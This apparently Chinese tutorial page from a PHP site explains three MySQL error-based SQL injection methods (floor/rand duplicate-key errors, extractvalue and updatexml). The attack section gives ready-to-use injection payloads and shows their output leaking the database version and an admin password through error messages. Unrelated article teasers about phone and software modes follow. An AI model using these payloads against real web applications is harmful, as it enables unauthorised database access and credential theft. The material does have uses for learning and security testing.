mysql3种报错模式注入_MySQL-mysql教程-PHP中文網

首頁

資料庫

mysql教程

mysql3种报错模式注入_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:04 PM

模式

1、通过floor报错可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by...

1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下：
首先进行正常查询：
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id输入存在注入的话，可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码：
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
请看 ( http://www.yuefengqing.com/ )
2、ExtractValue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));

ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

微信的免打扰模式有什么作用Feb 23, 2024 pm 10:48 PM

微信勿扰模式什么意思如今，随着智能手机的普及和移动互联网的迅猛发展，社交媒体平台已经成为人们日常生活中不可或缺的一部分。而微信作为国内最流行的社交媒体平台之一，几乎每个人都有一个微信账号。我们可以通过微信与朋友、家人、同事进行实时沟通，分享生活中的点滴，了解彼此的近况。然而，在这个时代，我们也不可避免地面临着信息过载和隐私泄露的问题，特别是对于那些需要专注或

iPhone上的睡眠模式有何用途？Nov 04, 2023 am 11:13 AM

长期以来，iOS设备一直能够使用“健康”应用程序跟踪您的睡眠模式等。但是，当您在睡觉时被通知打扰时，这不是很烦人吗？这些通知可能无关紧要，因此在此过程中会扰乱您的睡眠模式。虽然免打扰模式是避免睡觉时分心的好方法，但它可能会导致您错过夜间收到的重要电话和消息。值得庆幸的是，这就是睡眠模式的用武之地。让我们了解更多关于它以及如何在iPhone上使用它的信息。睡眠模式在iPhone上有什么作用睡眠模式是iOS中专用的专注模式，会根据你在“健康”App中的睡眠定时自动激活。它可以帮助您设置闹钟，然后可以

请勿打扰模式在iPhone中不起作用：修复Apr 24, 2024 pm 04:50 PM

即使在“请勿打扰”模式下接听电话也可能是一种非常烦人的体验。顾名思义，请勿打扰模式可关闭来自邮件、消息等的所有来电通知和警报。您可以按照这些解决方案集进行修复。修复1–启用对焦模式在手机上启用对焦模式。步骤1–从顶部向下滑动以访问控制中心。步骤2–接下来，在手机上启用“对焦模式”。专注模式可在手机上启用“请勿打扰”模式。它不会让您的手机上出现任何来电提醒。修复2–更改对焦模式设置如果对焦模式设置中存在一些问题，则应进行修复。步骤1–打开您的iPhone设置窗口。步骤2–接下来，打开“对焦”模式设

epc+o模式是什么意思Nov 09, 2022 am 10:54 AM

epc+o模式就是指设计、采购等等为一体的总承包框架，它是在epc里面引申出来的一些运营环节；即在建设期内时，总承包商除了要去承担传统意义上的设计任务以外，还要去包揽在运营期内的所有维护任务。该模式可以极大程度提高许多项目的运营效率，也可以迅速降低运营成本。

在 Windows 10/11 上如何离开 S 模式Aug 03, 2023 pm 08:17 PM

S模式下的窗口旨在通过仅允许从Microsoft应用商店安装应用来提供增强的安全性和性能。虽然此功能有助于防止恶意软件和确保安全的计算环境，但它可能会限制想要从MicrosoftStore以外的源安装应用程序的用户。如果您发现自己处于这种情况并不断问自己如何在Windows10/11中切换出S模式，那么您来对地方了，因为我们将引导您完成如何使用两种不同的方法在Windows10/11中切换出S模式的步骤，确保您可以享受从您选择的任何地方安装应用程序的自由。了解如何在Windows中切换出S模式将

iPhone 15 Pro：如何摆脱状态栏中的静音模式符号Sep 24, 2023 pm 10:01 PM

在iPhone15Pro和iPhone15ProMax型号上，Apple推出了一个物理可编程的动作按钮，取代了音量按钮上方的传统响铃/静音开关。可以对操作按钮进行编程以执行几种不同的功能，但是在静音和响铃模式之间切换的能力并没有消失。默认情况下，长按一次操作按钮将使设备静音，按钮的触觉反馈将发出三个脉冲。两款iPhone15Pro机型在状态栏中的时间旁边都会显示一个划掉的铃铛符号，表示静音/静音模式已激活，并且它将一直保持到您再次长按“操作”按钮取消设备静音。如果您倾向于将iPhone置于静音模

iOS 17中的待机模式使用指南Aug 22, 2023 pm 04:01 PM

待机模式即将通过iOS17进入iPhone，本指南旨在向您展示如何在iPhone上使用此功能。待机模式是一项突破性功能，可将iPhone转变为动态、始终开启的智能显示屏。当您的iPhone在充电过程中水平侧放时，它会激活待机模式。此模式精美地展示了大量有用的小部件，包括但不限于当前时间、当地天气更新、您喜欢的照片的幻灯片，甚至是音乐播放控件。此模式的一个显着优点是它能够显示通知，允许用户查看和参与通知，而无需完全唤醒他们的iPhone。如何使用待机模式要使待机模式正常运行，iPhone必须运行i

如何启用“记事本++深色模式”和“记事本++深色主题”？Oct 27, 2023 pm 11:17 PM

记事本++暗模式v8.0没有参数，Notepad++是最有用的文本编辑器。在Windows10上运行的每个应用程序都支持暗模式。您可以命名Web浏览器，例如Chrome、Firefox和MicrosoftEdge。如果您在记事本++上工作，默认的白色背景可能会伤害您的眼睛。开发人员已将暗模式添加到版本8的Notepad++中，这是打开它的方法。为Windows11/10启用记事本++暗模式启动记事本++单击“设置”>“首选项”>“暗模式”选择“启用深色模式”重新启动记

See all articles